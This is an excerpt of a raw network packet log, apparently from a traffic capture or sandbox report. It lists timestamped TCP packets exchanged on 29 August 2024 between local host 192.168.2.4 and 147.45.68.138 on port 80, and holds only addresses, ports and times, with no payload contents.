                                                      Aug 29, 2024 22:52:30.040163994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040174007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040186882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040186882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040195942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040206909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040215015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040225029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040235996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040237904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040252924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040263891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040285110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040663958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040674925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040684938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040709019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040719032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040745020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040756941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040766954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040779114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040779114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040785074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040791988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040813923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040829897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040833950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040846109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040858030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040874958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040885925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040887117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040896893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040910959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040925980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040927887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040931940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040939093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040942907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040966988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040970087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040982008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.040982962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.040991068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041003942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041018963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041029930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041040897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041042089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041052103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041060925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041066885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041073084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041085958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041109085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041121006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041131973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041141987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041152954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041163921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041163921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041174889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041178942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041194916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041215897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041227102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041227102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041250944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041260004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041266918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041270018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041279078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041280031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041290998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041296959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041311979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041323900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041326046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041336060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041347027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041348934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041371107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041388988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041392088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041399956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041419983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041424990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041430950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041440964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041445971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041454077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041465044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041490078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041491032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041512966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041523933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041527033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041554928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041596889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041608095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041616917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041629076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041637897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041649103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041673899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041896105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041912079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041923046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041933060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041934013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041941881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041948080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041963100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041971922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.041987896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.041994095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042001009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042011023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042022943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042031050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042048931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042275906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042311907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042382002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042396069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042416096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042418003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042427063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042434931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042438030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042444944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042450905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042460918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042464018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042474985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042495012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042504072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042515039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042524099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042534113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042536974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042560101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042582035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042633057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042644024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042654991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042664051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.042679071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042679071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.042694092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127152920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127166986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127177000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127228975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127252102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127324104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127335072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127347946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127360106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127373934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127373934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127387047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127397060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127403021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127404928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127413988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127429962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127440929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127441883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127453089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127465010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127475023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127475977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127485991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127497911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127501011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127505064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127512932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127516031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127522945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127540112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127558947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127739906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127751112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127760887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127770901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127775908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127783060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127794981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127799988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127806902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127819061 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127841949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127878904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127888918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127898932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127911091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127914906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127923012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127933979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127933979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127948046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127957106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127964973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127985001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.127994061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.127995014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128005981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128016949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128027916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128029108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128043890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128050089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128051043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128065109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128073931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128087997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128109932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128361940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128395081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128412962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128447056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128489971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128501892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128511906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128524065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128525019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128535986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128561974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128572941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128607988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128643036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128679991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128757000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128767967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128783941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128788948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128794909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128803015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128807068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128819942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128834963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128876925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128889084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128897905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128911972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128921986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128932953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128933907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128943920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.128954887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128985882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.128988981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129002094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129026890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129046917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129111052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129122019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129129887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129141092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129148006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129153013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129165888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129195929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129216909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129229069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129239082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129249096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129251957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129267931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129275084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129291058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129300117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129319906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129327059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129343033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129353046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129355907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129363060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129378080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129384041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129395962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129396915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129407883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129417896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129417896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129432917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129441977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129467964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129475117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129494905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129504919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129511118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129532099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129594088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129605055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129614115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129632950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129647970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129662991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129688978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129702091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129725933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129772902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129808903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129812956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129823923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.129848003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.129861116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130075932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130112886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130120039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130131006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130156994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130193949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130206108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130213976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130224943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130228043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130243063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130269051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130713940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130724907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130734921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130753994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130770922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130790949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130801916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130817890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130825043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:30.130829096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:30.130834103 CEST4973980192.168.2.4147.45.68.138
